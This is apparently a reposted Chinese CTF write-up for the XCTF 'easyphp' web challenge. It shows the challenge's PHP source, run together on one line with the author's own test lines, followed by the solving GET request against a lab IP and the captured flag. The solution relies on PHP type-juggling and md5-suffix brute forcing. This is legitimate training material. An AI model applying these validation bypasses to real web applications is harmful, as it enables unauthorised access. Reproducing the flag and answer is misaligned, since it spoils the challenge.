#攻防世界-web- easyphp

依次構造a、b、c的值！

<?php //highlight_file(__FILE__); $key1 = 0; $key2 = 0; echo $key1; echo intval('1e7'); // $a = $_GET['a']; // $b = $_GET['b']; $a='1e7'; $b=3; echo intval($a); echo substr(md5($b),-6,6);$i=1; while($i<=100000) {if( '8b184b' === substr(md5($i),-6,6)){echo "The number is " . $i . "<br>";break; }$i++; } //$c=array("m",2022,array("n","DGGJ","DGGJ")); //echo json_encode($c); //$c=json_encode($c);//shi c={"m":"12345a","n":[[0,1,2],0]} $c=array("m",2022,array("n","DGGJ","DGGJ"));if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){if(isset($b) && '8b184b' === substr(md5($b),-6,6)){$key1 = 1;}else{die("Emmm...再想想");}}else{die("Emmm..."); }$c=(array)json_decode(@$_GET['c']); if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){$d = array_search("DGGJ", $c["n"]);$d === false?die("no..."):NULL;foreach($c["n"] as $key=>$val){$val==="DGGJ"?die("no......"):NULL;}$key2 = 1;}else{die("no hack");} }else{die("no"); }if($key1 && $key2){include "Hgfks.php";echo "You're right"."\n";echo $flag; }// echo str(intval('1e7')); // echo "You're right"."\n"; //echo "haha";$test="haha"; echo $test;?> Emmm...

用GET方法提交！

http://61.147.171.105:63643/?a=1e9&b=53724&c={“m”:“12345a”,“n”:[[0,1,2],0]}

cyberpeace{8e408aaf6079e7d495fde46e8ec9fbaa}

參考地址：

攻防世界web新手區easyphp題解writeup

weixin_46906325

于 2022-10-03 19:30:27 發布

734
收藏 2
文章標簽： 安全 php
版權
寫在前面
最近在學習CTF web相關知識，順帶學習php，在攻防世界平臺上做做題。遇到了一道名為easyphp的題目，對我這個新手一點也不easy，于是決定把過程記錄下來。
————————————————
版權聲明：本文為CSDN博主「weixin_46906325」的原創文章，遵循CC 4.0 BY-SA版權協議，轉載請附上原文出處鏈接及本聲明。
原文鏈接：https://blog.csdn.net/weixin_46906325/article/details/127154789

總結

以上是生活随笔為你收集整理的攻防世界-web- easyphp的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。